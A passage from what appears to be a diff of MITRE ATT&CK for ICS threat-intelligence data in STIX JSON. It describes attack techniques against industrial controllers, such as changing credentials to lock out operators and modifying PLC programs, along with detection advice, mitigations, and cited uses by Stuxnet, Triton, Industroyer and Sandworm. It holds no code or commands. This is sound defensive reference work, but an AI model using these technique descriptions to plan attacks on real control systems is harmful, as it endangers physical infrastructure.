New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "NCCIC January 2014", + "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 2019/11/07 ", + "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf" + }, + { + "source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", + "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-05T14:14:48.109Z", + "name": "Data from Local System", + "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Input/Output Server", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "created": "2023-03-30T18:56:02.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0893", + "external_id": "T0893" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-07T13:40:53.842Z", + "name": "Change Credential", + "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device’s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Felix Eberstaller" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "created": "2023-03-30T14:04:17.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0892", + "external_id": "T0892" + }, + { + "source_name": "German BAS Lockout Dec 2021", + "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Program", + "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. \n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Asset: Software", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0889", + "external_id": "T0889" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "type": "relationship", + "id": "relationship--ca0c26d7-c4a9-4c4a-bbd4-f3df4b1f5f69", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:50:10.284Z", + "description": "Monitor for processes spawning from known command shell applications (e.g., PowerShell, Bash). Benign activity will need to be allow-listed. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5e52859-8dab-4e7e-af70-bb38c6993c98", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.200Z", + "relationship_type": "mitigates", + "description": "Preventing screen capture on a device may require disabling various system calls supported by the operating systems (e.g., Microsoft WindowsGraphicsCaputer APIs), however, these may be needed for other critical applications.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3d4ea0e2-9f51-40f9-a22b-8265f696fd83", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:19:04.853Z", + "description": "Monitor logon activity for unexpected or unusual access to devices from the Internet.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc74ff8f-d5fa-40fb-8c0b-f16af3ff36e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Apply DLP to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).\n", + "source_ref": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--107d9a23-991b-44f5-97f6-7f6983c7013a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7258c355-677c-452d-b1fc-27767232437b", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "David Voreacos, Katherine Chinglinsky, Riley Griffin December 2019", + "description": "David Voreacos, Katherine Chinglinsky, Riley Griffin 2019, December 03 Merck Cyberattacks $1.3 Billion Question: Was It an Act of War? Retrieved. 2019/12/06 ", + "url": "https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:59:02.909Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) disrupted manufacturing facilities supplying vaccines, resulting in a halt of production and the inability to meet demand for specific vaccines. (Citation: David Voreacos, Katherine Chinglinsky, Riley Griffin December 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d8911566-f622-4a01-b765-514dbbfd8201", + "created": "2022-09-28T20:27:01.345Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.447Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can deploy Tcpdump to sniff network traffic and collect PCAP files.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--92634d06-42e5-407f-bcb7-cafb1ddeafce", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:06:08.814Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) used valid credentials when laterally moving through RDP jump boxes into the ICS environment. (Citation: Dragos December 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c341d13-938e-4535-ac75-10a79abc7017", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:46:17.575Z", + "description": "Monitor for application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--97c5b388-518a-46ec-b2b0-41bfa6a83204", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--53a54e4a-2b38-4b0c-8f60-252a68767443", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:58.883Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) modifies the Import Address Tables DLLs to hook specific APIs that are used to open project files. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--afd63145-6033-49e4-ad43-d0b35fa5ed88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.061Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ca3c4d4b-cf53-4489-904f-8a220e421aeb", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T19:58:55.128Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s OPC module can brute force values and will send out a 0x01 status which for the target systems equates to a Primary Variable Out of Limits misdirecting operators from understanding protective relay status. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020", + "description": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA 2020, October 15 Indictment: Conspiracy to Commit an Offense Against the United States Retrieved. 2021/04/07 ", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:53:50.448Z", + "description": "In the Ukraine 2015 incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) sent spearphishing attachments to three energy distribution companies containing malware to gain access to victim systems. (Citation: UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7bd6e5e4-6614-41ed-8a84-8eb633a91e07", + "created": "2023-03-31T17:45:32.860Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T16:12:03.917Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized VBS and batch scripts for file movement and as wrappers for PowerShell execution.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aaacfa83-033f-4555-ba6b-ecc7692a25aa", + "created": "2023-03-30T19:03:59.066Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:03:59.066Z", + "description": "Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c1154a56-6f5f-4760-8b34-79b0e8a79c1f", + "created": "2023-03-10T20:34:55.362Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:34:55.362Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dc46ffc2-eac7-4491-8d2a-46cf8e2e963f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4256a0c2-437d-4a4c-88ac-d08d3041b8c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.178Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0b7f643e-8975-4998-acbb-7405fa944a68", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:38.303Z", + "description": "Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Also monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f8abf6f-0dd0-4449-b555-733fe7296177", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:19.351Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leveraged the TriStation protocol to download programs onto Triconex Safety Instrumented System. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 